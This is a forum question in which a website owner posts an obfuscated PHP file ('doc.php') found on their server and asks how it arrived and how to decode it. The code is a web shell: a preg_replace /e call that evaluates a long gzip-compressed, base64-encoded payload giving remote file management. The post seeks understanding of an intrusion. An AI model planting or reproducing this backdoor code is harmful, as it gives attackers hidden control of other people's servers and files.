# How does this giant regex work?

Tags: php, regex, security, cryptography

I recently found the code below in one of my directories, in a file called `doc.php`. The file functions or links to a file manager. It's quite nicely done. Basically, it lists all the files in the current directory, and it lets you change directories.

It had access to all my files (add, rename, info, delete...). I don't remember installing it. I deleted it, deleted a few suspicious and large files simple called `core` and reset all my passwords.

Googling some of the code snippets leads to a lot of results, most of them not very informative... [However, here is a more informative result.](http://www.the16types.info/vbulletin/site-discussion/31050-firefox-reporting-the16types-attack-site-3.html#post663577)

However, I'm not sure I understand how this thing works. I have a few questions:

1. **What possible ways could this have gotten on my site / directory?**
2. **How can I trace back what the results of the preg_replace look like?**

   ```
   <?php 
   $auth_pass = ""; 
   $color = "#df5"; 
   $default_action = "FilesMan"; 
   $default_charset = "Windows-1251"; 
   preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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